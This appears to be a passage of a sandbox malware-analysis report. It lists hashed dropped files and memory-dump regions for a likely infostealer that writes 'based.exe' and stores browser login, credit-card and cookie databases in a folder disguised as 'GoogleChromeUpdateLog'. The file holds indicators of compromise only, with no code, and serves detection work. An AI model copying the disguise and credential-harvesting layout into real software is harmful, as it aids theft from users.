MD5 c4989bceb9e7e83078812c9532baeea7
SHA1 aafb66ebdb5edc327d7cb6632eb80742be1ad2eb
SHA256 a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd
SHA512 fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671

C:\Users\Admin\AppData\Local\Temp\_MEI41882\python310.dll

MD5 7340d4ba06dd8fec5319f838eb2ec78b
SHA1 384e5dd50bf76e5a4ce4d60cda71d435c0deddbf
SHA256 dc89a70fe4b6cbc0e493ca97888e3e144a038de96b181c70c869ff7498af3996
SHA512 bcbbe9963e1aff9d24d90fa0c579d7597ff44123d6675060c33778e9eac649dd616473547b3df7de160510fe7ea51ba284b7ef781d2b45db3897a36f0eedc276

C:\ProgramData\Microsoft\based.exe

MD5 623884aa7d9185f3220e04d702f3a33c
SHA1 61f2c874ad5154f240bca3c2f0515579f0e4d480
SHA256 040944684bf8824f1ab6b8d96b8b2a067ff8bac322889d3f55c00fb884e32fd7
SHA512 dcce2612086d5a7308379b0f413896fc1476f0747a7b001479e18f89a07f95842938b85bbb16ae81c994dce1908ca8ecae4016b9ff9e46786b1fce64dd6f26e8

C:\ProgramData\Microsoft\based.exe

MD5 831b246678c030e9afbb7efb8ce70e16
SHA1 4981e6863e830a2bb6b1f1d933ee779c6c00b533
SHA256 3936d7a71ccd094b500a8ff0da889174653855aafd97b74f3c0a1151427e4dfa
SHA512 9229a4ffa19546b43ab98f856232df0907acbf64a0f27700b073bc4e187b2b608b2542efe9c48af55c64ec6010bf74c5688edd67b427fca187c3bc5b06544a10

C:\ProgramData\Microsoft\based.exe

MD5 4eb398a03b6eed1979a91d35cc23cff5
SHA1 f01087db98af2c81be0313284eeeba89b0edb7a1
SHA256 45a0883333f6f81a1fbd915db826bc2b8a9a2c6002f09a29450ba56576d90f3d
SHA512 8a33f5f844074fc7951fceccf32e8ed1bdbdce488d1a17685b345736d94ca3f2e3e00263df19c7b2c5b53186addf9630ee2ee57fb73c9abbc29a6458ab01ef45

memory/4256-1955-0x00007FF916500000-0x00007FF91651F000-memory.dmp

memory/5688-1989-0x000002A9D2750000-0x000002A9D27BA000-memory.dmp

memory/5688-1988-0x000002A9D26D0000-0x000002A9D26DA000-memory.dmp

memory/5688-1992-0x000002A9D2A40000-0x000002A9D2A7A000-memory.dmp

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\login_data_db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 7e58c37fd1d2f60791d5f890d3635279
SHA1 5b7b963802b7f877d83fe5be180091b678b56a02
SHA256 df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7
SHA512 a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 73bd1e15afb04648c24593e8ba13e983
SHA1 4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256 aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA512 6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\cookies_db

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

memory/5688-1993-0x000002A9D26A0000-0x000002A9D26C6000-memory.dmp

memory/5688-2011-0x000002A9D3670000-0x000002A9D3682000-memory.dmp

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

memory/4256-2356-0x00007FF916380000-0x00007FF9164FD000-memory.dmp

memory/4256-2414-0x00007FF916330000-0x00007FF91635E000-memory.dmp

memory/4256-2413-0x00007FF916360000-0x00007FF916379000-memory.dmp

memory/4256-2478-0x00007FF916130000-0x00007FF916248000-memory.dmp

memory/4256-2465-0x00007FF916090000-0x00007FF9160B4000-memory.dmp

memory/4256-2477-0x00007FF927600000-0x00007FF92760D000-memory.dmp

memory/4256-2476-0x00007FF916250000-0x00007FF916265000-memory.dmp

memory/4256-2475-0x00007FF916270000-0x00007FF916328000-memory.dmp

memory/4256-2474-0x00007FF915D10000-0x00007FF916085000-memory.dmp

memory/4256-2473-0x00007FF916330000-0x00007FF91635E000-memory.dmp

memory/4256-2472-0x00007FF927850000-0x00007FF92785D000-memory.dmp

memory/4256-2471-0x00007FF916360000-0x00007FF916379000-memory.dmp

memory/4256-2470-0x00007FF916380000-0x00007FF9164FD000-memory.dmp

memory/4256-2469-0x00007FF916500000-0x00007FF91651F000-memory.dmp

memory/4256-2468-0x00007FF917B20000-0x00007FF917B38000-memory.dmp

memory/4256-2467-0x00007FF91E3B0000-0x00007FF91E3DC000-memory.dmp

memory/4256-2466-0x00007FF92FB90000-0x00007FF92FB9F000-memory.dmp

memory/4256-2464-0x00007FF916740000-0x00007FF916BA6000-memory.dmp

memory/6256-2744-0x000001E5B6CF0000-0x000001E5B6DA5000-memory.dmp

memory/6256-2745-0x000001E5B6DB0000-0x000001E5B6DBA000-memory.dmp

memory/6256-2741-0x000001E5B6CD0000-0x000001E5B6CEC000-memory.dmp

memory/6256-2750-0x000001E5B6F20000-0x000001E5B6F3C000-memory.dmp

memory/6256-2759-0x000001E5B6F00000-0x000001E5B6F0A000-memory.dmp

memory/6256-2763-0x000001E5B6F10000-0x000001E5B6F18000-memory.dmp

memory/6256-2765-0x000001E5B6F50000-0x000001E5B6F5A000-memory.dmp

memory/6256-2764-0x000001E5B6F40000-0x000001E5B6F46000-memory.dmp

memory/6256-2762-0x000001E5B6F60000-0x000001E5B6F7A000-memory.dmp